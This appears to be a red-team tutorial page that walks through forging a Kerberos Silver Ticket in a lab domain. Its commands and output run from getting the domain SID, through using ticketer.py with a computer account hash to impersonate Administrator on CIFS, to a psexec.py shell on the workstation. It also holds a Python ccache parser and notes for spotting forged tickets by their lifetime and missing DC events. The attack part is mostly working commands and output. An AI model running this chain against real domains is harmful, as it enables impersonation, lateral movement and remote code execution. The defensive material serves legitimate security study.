
🎟️ Silver Ticket

📚 What is a Silver Ticket?

A Silver Ticket is a forged Kerberos service ticket (TGS) that lets an attacker authenticate to one specific service in a domain without ever contacting the Key Distribution Center (KDC). Unlike a Golden Ticket, which forges a TGT with the krbtgt key and can therefore be exchanged for tickets to any service in the domain, a Silver Ticket is bound to a single service on a single host (for example CIFS, HTTP, or LDAP). Because the KDC never issues or sees the ticket, no TGS request is logged on the domain controller: the only party that checks the ticket is the service itself, and by default it trusts the PAC inside the ticket as long as the ticket decrypts with its own key. (Services running as Local System or Network Service, which includes CIFS, do not ask the DC to verify the PAC signatures; a service running under an ordinary account may, and a forged ticket can then fail.)

How Silver Tickets Work

Kerberos uses service tickets (TGS) to authenticate users to individual services. The ticket is encrypted with the long-term key of the account that owns the service's SPN (the NT hash for RC4-HMAC, or the AES keys for AES128/AES256), not with the krbtgt key as in a Golden Ticket. For services hosted by the operating system itself, such as CIFS on a workstation, that account is the computer account (WK01$ in the example below). An attacker who obtains that key can forge a TGS whose PAC claims any username and any group membership, and present it to that service.

πŸ› οΈ Crafting a Silver Ticket with Ticketer ​

Impacket's ticketer.py is a Python tool for crafting Kerberos tickets, Silver Tickets included, that never talks to the Key Distribution Center (KDC). To forge a Silver Ticket you need the key of the account that owns the target SPN (its NT hash via -nthash, or an AES key via -aesKey), the domain SID, the domain name, the SPN of the service, and the username to impersonate.

1. Obtaining the Domain SID

The SID (Security Identifier) is a unique value that identifies objects such as users, groups, and computers within a Windows domain. It is essential for crafting a valid Silver Ticket: the PAC inside the ticket carries the impersonated user's SID and group SIDs, which are built from the domain SID plus a RID, so a wrong domain SID produces a ticket the service accepts but that maps to nobody. To retrieve it, use Impacket's lookupsid.py with valid domain credentials. The final argument 0 is the maximum RID to brute force, so the tool only prints the domain SID instead of enumerating every account:

```bash
lookupsid.py "red.lab"/'qu35t':'Password123'@"192.168.10.100" 0
```

```text
[*] Brute forcing SIDs at 192.168.10.100
[*] StringBinding ncacn_np:192.168.10.100[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3433736088-161430583-3583626515
```

2. Crafting the Silver Ticket

Once we have the necessary information, we can craft the Silver Ticket for the desired service. In this example we create a Silver Ticket for the CIFS (SMB) service on a domain workstation. The SPN cifs/wk01.red.lab belongs to the computer account WK01$, so the hash passed with -nthash must be that computer account's NT hash, not the hash of the user being impersonated:

```bash
ticketer.py -nthash "da82fc64004dc986acb2b886f14565c5" -domain-sid "S-1-5-21-3433736088-161430583-3583626515" -domain "red.lab" -spn "cifs/wk01.red.lab" Administrator
```

```text
Impacket v0.12.0.dev1+20240808.192004.154de8a5 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for red.lab/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache
```

This command generates a Silver Ticket for the CIFS service and saves it as a .ccache file, which Kerberos-aware clients can use for authentication. Note the two checksums in the output: ticketer signs PAC_SERVER_CHECKSUM with the service key it was given, and PAC_PRIVSVR_CHECKSUM with that same key in place of the krbtgt key; the service cannot notice the difference unless it asks the DC to verify the PAC. Unless overridden, ticketer gives the impersonated user RID 500 and the default administrative groups (Domain Admins, Enterprise Admins, and so on), and a ten-year lifetime, which is why the expiry in the next step is in 2034.

3. Using the Silver Ticket

Once the Silver Ticket has been generated and saved in the .ccache file, we point the Kerberos credential cache of our current session at it (use an absolute path if you will change directory later):

```bash
export KRB5CCNAME=Administrator.ccache
```

After exporting the variable, we can check that the ticket is loaded by listing the cache with klist. The ten-year validity window is the tell-tale of a ticketer default: a real domain caps service-ticket lifetime at the "Maximum lifetime for service ticket" policy, 600 minutes by default, so anyone reviewing caches on a host will spot it:

```bash
klist
```

```text
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@red.lab

Valid starting       Expires              Service principal
09/22/2024 16:22:31  09/20/2034 16:22:31  cifs/wk01.red.lab@red.lab
        renew until 09/20/2034 16:22:31
```
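The .ccache file that klist reads above is the MIT krb5 FILE credential cache, the same layout impacket's ticketer.py writes. As an added example (not code from the original page or from Impacket), the block below writes a minimal version-4 ccache and parses it back, then applies the check a defender would run over caches found on a host: a service ticket whose lifetime exceeds the domain's default 10-hour policy was not issued by a KDC. The sample tickets, timestamps, and the placeholder ticket bytes are constructed; the 87600-hour lifetime mirrors the klist output shown on this page.

```python
import struct

# Domain default "Maximum lifetime for service ticket" is 600 minutes.
MAX_SERVICE_TICKET_LIFETIME = 10 * 3600


def _data(blob: bytes) -> bytes:
    """ccache 'data' item: big-endian uint32 length followed by the bytes."""
    return struct.pack(">I", len(blob)) + blob


def _principal(realm: str, components: list, name_type: int = 1) -> bytes:
    """ccache principal (v3/v4): name_type, component count, realm, components."""
    out = struct.pack(">II", name_type, len(components)) + _data(realm.encode())
    for comp in components:
        out += _data(comp.encode())
    return out


def build_ccache(user, spn, realm, start, end, ticket_blob, session_key=bytes(16)):
    """Single-credential v4 FILE ccache: version, header tags, default principal,
    then one credential (client, server, keyblock, 4 timestamps, is_skey, flags,
    addresses, authdata, ticket, second_ticket)."""
    header = struct.pack(">HHii", 1, 8, 0, 0)            # tag 1 = DeltaTime (sec, usec)
    buf = b"\x05\x04" + struct.pack(">H", len(header)) + header
    buf += _principal(realm, [user])                      # default principal
    buf += _principal(realm, [user])                      # credential: client
    buf += _principal(realm, spn.split("/"), 2)           # credential: server (NT-SRV-INST)
    buf += struct.pack(">H", 23) + _data(session_key)     # keyblock, enctype 23 = RC4-HMAC
    buf += struct.pack(">IIII", start, start, end, end)   # authtime, starttime, endtime, renew_till
    buf += b"\x00"                                        # is_skey
    buf += struct.pack(">I", 0x40A00000)                  # ticket_flags (constructed value)
    buf += struct.pack(">I", 0)                           # address count
    buf += struct.pack(">I", 0)                           # authdata count
    buf += _data(ticket_blob)                             # the encrypted Ticket (placeholder here)
    buf += _data(b"")                                     # second_ticket
    return buf


class _Reader:
    def __init__(self, raw: bytes):
        self.raw, self.off = raw, 0

    def take(self, n: int) -> bytes:
        if self.off + n > len(self.raw):
            raise ValueError("truncated ccache")
        chunk = self.raw[self.off:self.off + n]
        self.off += n
        return chunk

    def u8(self): return self.take(1)[0]
    def u16(self): return struct.unpack(">H", self.take(2))[0]
    def u32(self): return struct.unpack(">I", self.take(4))[0]
    def data(self): return self.take(self.u32())

    def principal(self) -> str:
        self.u32()                      # name_type, not needed for display
        count = self.u32()
        realm = self.data().decode()
        return "/".join(self.data().decode() for _ in range(count)) + "@" + realm


def parse_ccache(raw: bytes) -> list:
    """Return one dict per credential in a v4 FILE ccache (other versions rejected)."""
    r = _Reader(raw)
    if r.take(2) != b"\x05\x04":
        raise ValueError("only ccache version 4 is handled here")
    r.take(r.u16())                     # skip header tags (DeltaTime etc.)
    r.principal()                       # default principal
    creds = []
    while r.off < len(raw):
        cred = {"client": r.principal(), "server": r.principal()}
        cred["enctype"] = r.u16()
        cred["key"] = r.data()
        cred["authtime"], cred["starttime"] = r.u32(), r.u32()
        cred["endtime"], cred["renew_till"] = r.u32(), r.u32()
        cred["is_skey"] = r.u8()
        cred["flags"] = r.u32()
        for _ in range(r.u32()):        # addresses: addrtype + data
            r.u16(); r.data()
        for _ in range(r.u32()):        # authdata: adtype + data
            r.u16(); r.data()
        cred["ticket"] = r.data()
        r.data()                        # second_ticket
        creds.append(cred)
    return creds


def ticket_lifetime(cred: dict) -> int:
    return cred["endtime"] - cred["starttime"]


def looks_forged(cred: dict) -> bool:
    """A KDC caps TGS lifetime at domain policy; ticketer's default is 87600 hours."""
    return ticket_lifetime(cred) > MAX_SERVICE_TICKET_LIFETIME


def audit(raw: bytes) -> list:
    return [(c["client"], c["server"], ticket_lifetime(c) // 3600, looks_forged(c))
            for c in parse_ccache(raw)]


# Constructed samples: a ticketer-style forgery and a policy-conformant ticket.
START = 1727022151                       # arbitrary epoch seconds, 2024-09-22
FORGED = build_ccache("Administrator", "cifs/wk01.red.lab", "red.lab",
                      START, START + 87600 * 3600, b"\x61" * 32)
LEGIT = build_ccache("qu35t", "cifs/wk01.red.lab", "red.lab",
                     START, START + 10 * 3600, b"\x61" * 32)

if __name__ == "__main__":
    for row in audit(FORGED) + audit(LEGIT):
        print(row)
```

Lifetime is the cheap tell; a ticketer invocation with -duration set to something plausible defeats it, at which point the remaining host-side signals are the missing 4769 on the DC for the corresponding 4624 on the target and, where the service validates PACs, the bad PAC_PRIVSVR_CHECKSUM.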

4. Accessing the Target Service

With the Silver Ticket loaded, we can access the target service without the KDC ever being involved. psexec.py with -k uses the cache named in KRB5CCNAME and -no-pass suppresses the password prompt. The target must be given as the exact host name in the SPN (wk01.red.lab) and must resolve, because the client picks the ticket by matching the service principal; an IP address or a short name will not match cifs/wk01.red.lab. The forged PAC presents us as Administrator, so ADMIN$ is writable and psexec.py can install its service. On the domain controller there is no 4769 (service ticket requested) for this logon; the only trace is the Kerberos 4624 on WK01 itself, which is what makes Silver Tickets quieter than Golden Tickets:

```bash
psexec.py -k -no-pass "Administrator"@"wk01.red.lab"
```

```text
Impacket v0.12.0.dev1+20240808.192004.154de8a5 - Copyright 2023 Fortra

[*] Requesting shares on wk01.red.lab.....
[*] Found writable share ADMIN$
[*] Uploading file rYyyktki.exe
[*] Opening SVCManager on wk01.red.lab.....
[*] Creating service xjly on wk01.red.lab.....
[*] Starting service xjly.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.22621.1702]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\System32>
```